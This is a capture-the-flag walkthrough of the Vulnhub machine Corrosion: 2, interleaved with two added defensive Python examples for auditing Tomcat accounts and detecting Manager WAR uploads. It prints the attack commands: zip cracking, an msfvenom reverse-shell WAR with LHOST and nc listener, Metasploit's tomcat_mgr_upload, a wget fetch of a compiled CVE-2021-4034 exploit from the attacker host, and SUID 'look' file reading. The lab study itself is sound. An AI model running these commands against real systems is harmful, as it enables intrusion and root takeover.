
Vulnhub range - Corrosion: 2

2022-06-25 19:13:00 Czheisenberg

Preparation

Attacker: Kali

Target: CORROSION: 2, NAT, 192.168.91.0 network segment

Download link:

https://www.vulnhub.com/entry/corrosion-2,745/

Information gathering and exploitation

Host discovery

As shown in the figure, the target IP address is 192.168.91.189.

Port scanning

nmap -sV -O -p- -T4 -A 192.168.91.189 -oN corronsion_nmap.txt


As shown in the figure, three ports are open: 22, 80 (Apache2 default page) and 8080 (Tomcat). This shows that the target's web application is built on Java. Based on the Tomcat targets I have done before: get into the manager backend, then upload a WAR package to get a reverse shell.

HTTP

http://192.168.91.189/

http://192.168.91.189:8080/

Directory scanning

python3 dirsearch.py -u http://192.168.91.189:8080/

Suspicious files

The scan turns up a lot of results. Among them, docs and examples are the documentation and examples shipped with Tomcat.

Let's take a look at readme.txt and backup.zip.

http://192.168.91.189:8080/readme.txt

It says, roughly, that someone left a file no one could find (nonsense) and that it can be opened with a password, so it is referring to the backup.zip file. Download it.

wget http://192.168.91.189:8080/backup.zip

unzip backup.zip


As shown in the figure, a password really is required.

Password cracking

zip2john backup.zip > password_hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt password_hash.txt



As shown in the figure, the password is @administrator_hi5; it comes out quickly.

Now decompress:
unzip backup.zip

As shown in the figure, decompression succeeds and there are many files.

After searching, the username and password are found at the bottom of the tomcat-users.xml file:

manager:melehifokivai

admin:melehifokivai

Both of these usernames can log in to the Tomcat manager backend; log in with two browsers respectively.
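From the defender's side, the recovered tomcat-users.xml shows exactly the kind of misconfiguration this box is built on: plaintext credentials, one password shared by two accounts, and both accounts holding manager roles. The audit below is an added example, not code from the original post; the sample XML is constructed for it (the role assignments and the third account are assumptions, only the two username/password pairs come from the post), and the "plaintext unless it looks like a Tomcat digest" rule is a heuristic of this example.

```python
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample modelled on the recovered file; roles and the "viewer" account are assumed.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="manager" password="melehifokivai" roles="manager-gui,manager-script"/>
  <user username="admin" password="melehifokivai" roles="manager-gui,admin-gui"/>
  <user username="viewer" password="5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8" roles="tomcat"/>
</tomcat-users>
"""

# Roles that grant control over the Manager / Host Manager web applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}
# Heuristic: Tomcat digested credentials are hex, or salt$iterations$hex; anything else is plaintext.
DIGEST_RE = re.compile(r"^(?:[0-9a-f]+|[0-9a-f]+\$\d+\$[0-9a-f]+)$", re.I)


def audit_tomcat_users(xml_text):
    """Return a sorted list of (username, issue) tuples describing weak account configuration."""
    root = ET.fromstring(xml_text)
    users = []
    for elem in root.iter():
        if elem.tag.split("}")[-1] == "user":  # strip the xmlns Tomcat puts on every element
            roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
            users.append((elem.get("username", ""), elem.get("password", ""), roles))
    findings = []
    by_password = defaultdict(list)
    for name, pw, roles in users:
        by_password[pw].append(name)
        priv = roles & PRIVILEGED_ROLES
        if priv:
            findings.append((name, "privileged roles: " + ",".join(sorted(priv))))
        if pw and not DIGEST_RE.match(pw):
            findings.append((name, "password stored in plaintext"))
        if pw and pw.lower() == name.lower():
            findings.append((name, "password equals username"))
    for pw, names in by_password.items():  # the same secret on two accounts doubles the exposure
        if pw and len(names) > 1:
            for name in names:
                others = ",".join(sorted(n for n in names if n != name))
                findings.append((name, "password shared with " + others))
    return sorted(set(findings))
```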

Now that I have logged in to the backend, let's try uploading a WAR package to get a reverse shell.

For making a WAR package, see my previous blog post:

https://www.ohhhhhh.top/2021/12/29/web penetration ——My-Tomcat-HOST-1/

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.27.243.168 LPORT=4444 -f war > shell.war

Start an nc listener on Kali, then upload (copy shell.war to Win11):
nc -lvnp 4444



Fuck you, 404. It seems this method won't work.

Then I found that msfconsole has a module that can get a shell using the account and password:
use exploit/multi/http/tomcat_mgr_upload


Set the options in the red box; the account and password were obtained earlier.

Then **run**.



After running, type shell to enter the shell. It looks like we are the tomcat user.

python3 -c "import pty;pty.spawn('/bin/bash')"

Enter this command to get a standard terminal.
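The shell above arrives through an authenticated WAR deploy, which Tomcat records in its access log. The detector below is an added example, not code from the post or from Metasploit: it parses lines in Tomcat's default AccessLogValve pattern (%h %l %u %t "%r" %s %b), flags successful POST/PUT requests to the Manager upload/deploy endpoints, and notes the first non-manager path the same client requested afterwards (typically the freshly deployed context). The log lines are constructed for this example, including the random-looking context name.

```python
import re

# Constructed sample access log in Tomcat's default pattern; IPs, times and paths are made up.
SAMPLE_ACCESS_LOG = """\
192.168.91.1 - - [25/Jun/2022:19:10:01 +0800] "GET /readme.txt HTTP/1.1" 200 113
192.168.91.1 - manager [25/Jun/2022:19:12:40 +0800] "GET /manager/html HTTP/1.1" 200 22031
192.168.91.1 - manager [25/Jun/2022:19:12:58 +0800] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 22145
192.168.91.1 - - [25/Jun/2022:19:13:02 +0800] "GET /xQ1rT9/ HTTP/1.1" 200 0
192.168.91.50 - manager [25/Jun/2022:19:20:00 +0800] "GET /manager/html/list HTTP/1.1" 200 22031
10.0.0.5 - - [25/Jun/2022:19:21:00 +0800] "GET /docs/ HTTP/1.1" 200 19098
"""

# %h %l %u %t "%r" %s %b -> client, ident, authenticated user, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Manager endpoints that accept a WAR: the HTML form upload and the text-interface deploy.
DEPLOY_RE = re.compile(r"^/manager/(?:html/upload|text/deploy)(?:[?/]|$)")


def detect_manager_deploys(log_text):
    """Return (ip, user, method, path, follow_up_path) for every successful WAR deploy.

    follow_up_path is the first request from the same client to a path outside /manager
    after the deploy, or None if there was none; that is the context worth inspecting.
    """
    deploys = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, path, status = m["ip"], m["method"], m["path"], m["status"]
        for ev in deploys:  # attach the first post-deploy request of this client
            if ev["ip"] == ip and ev["follow"] is None and not path.startswith("/manager"):
                ev["follow"] = path
        if DEPLOY_RE.match(path) and method in ("POST", "PUT") and status.startswith("2"):
            deploys.append({"ip": ip, "user": m["user"], "method": method,
                            "path": path, "follow": None})
    return [(e["ip"], e["user"], e["method"], e["path"], e["follow"]) for e in deploys]
```

Alerting on this pattern (or simply on any 2xx to the deploy endpoints outside a change window) catches the technique regardless of which tool performed the upload.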

flag 1

The first flag, user.txt, is in the directory /home/randy.

/home/randy/note.txt

 Hey Randy, this is your system administrator. I hope you have a nice day! I just want you to know
 that I changed your permissions on the home directory. You are temporarily unable to delete or add files.
 I will change these permissions later.
 See you next Monday, randy!

Check which users exist in /etc/passwd.

Method 1

It turns out that the jaye user's password is the same as the manager password: melehifokivai

find / -perm -u=s -type f 2>/dev/null

Searching for SUID commands turned up a familiar one: polkit-agent-helper-1. CVE number:
CVE-2021-4034

Exploit link:

https://github.com/berdav/CVE-2021-4034

I found that the target has no git command, but wget can be used instead. Then I found there was no make command either, so it cannot be compiled there; but we can compile on Kali, download the compiled files to the target and run them. In future, just upload the compiled files directly.

Download the compiled files to the target:

wget http://172.27.243.168:8000/CVE-2021-4034.zip


Then decompress:
unzip CVE-2021-4034.zip

Then enter the CVE-2021-4034 folder and run ./cve-2021-4034; if nothing goes wrong you will get root privileges.

As shown in the picture, I got root privileges. Once again privilege escalation succeeded through CVE-2021-4034, a vulnerability that has existed for more than ten years!!!

flag 2

Method 2

After logging in over SSH as jaye:melehifokivai, there is a look command in the File directory under its home directory that reads files without authorization:
./look '' '/root/root.txt'


As shown in the figure, the second flag is read directly; in a competition you can score by submitting the flag directly.

Method 3

Referencing a more experienced author's blog:

https://www.cnblogs.com/sainet/p/15668420.html#%E4%B8%89%E6%8F%90%E6%9D%83

I failed the test here; maybe it's me.

Summary

  1. CVE-2021-4034
  2. look reading files without authorization
  3. msfconsole use exploit/multi/http/tomcat_mgr_upload to get a shell
Copyright notice

This article was written by [Czheisenberg]; please include a link to the original when reposting. Thanks.
https://yzsam.com/2022/02/202202190520500676.html